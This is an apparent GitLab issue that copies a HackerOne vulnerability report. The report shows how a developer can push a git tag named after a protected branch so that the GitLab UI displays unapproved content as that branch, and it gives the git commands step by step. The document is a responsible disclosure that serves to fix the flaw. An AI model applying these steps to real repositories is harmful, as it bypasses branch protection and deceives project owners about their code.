An attacker is able to commit to tags with the same name as protected branches, and in many areas GitLab treats the tag as a branch (ambiguous git ref)
HackerOne report #1947917 by js_noob
on 2023-04-14, assigned to @greg:
Report | Attachments | How To Reproduce
Report
Summary
Hello team, this is a report to bypass the fix that was introduced in this issue. The fix was introduced to block any attacker from creating tags having the name of the default branch, however, an attacker can still create tags having the name of any protected branch.
Steps to reproduce
As an owner:
- Create a new project
- Create a new branch called
protected
- Protect that branch and don't allow anyone to push changes to it (Settings => Repository => Protected branches)
- Add a developer to that project
As the developer:
- Clone the project locally
git clone https:...
- Checkout the protected branch
git fetch origin protected
git checkout protected
- Create a new branch with the name
new-feature
git checkout -b 'new-feature'
- Edit any changes to any file
- Commit and push the
new-feature
branch
git add .
git commit -m 'new-feature'
git push origin HEAD
- Grab the hash of the final commit using the following command
git rev-parse HEAD
- Switch back to the protected branch
git checkout protected
- Create a tag with the name of protected pointing to the latest commit of the
new-feature
branch
git tag protected HASH_FROM_STEP_10
- Push the tags to the remote
git push origin --tags
- Remove the
new-feature
branch from the remote
git push -d origin 'new-feature'
As the owner:
- From the UI navigate to https://gitlab.com/GROUP/PROJECT/-/tree/protected, and verify the changes
Video/POC
bandicam_2023-04-14_22-48-35-879.mp4
Impact
An attacker is able to change the content of any non-default protected branch file by pushing a tag with the protected branch name.
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
How To Reproduce
Please add reproducibility information to this section: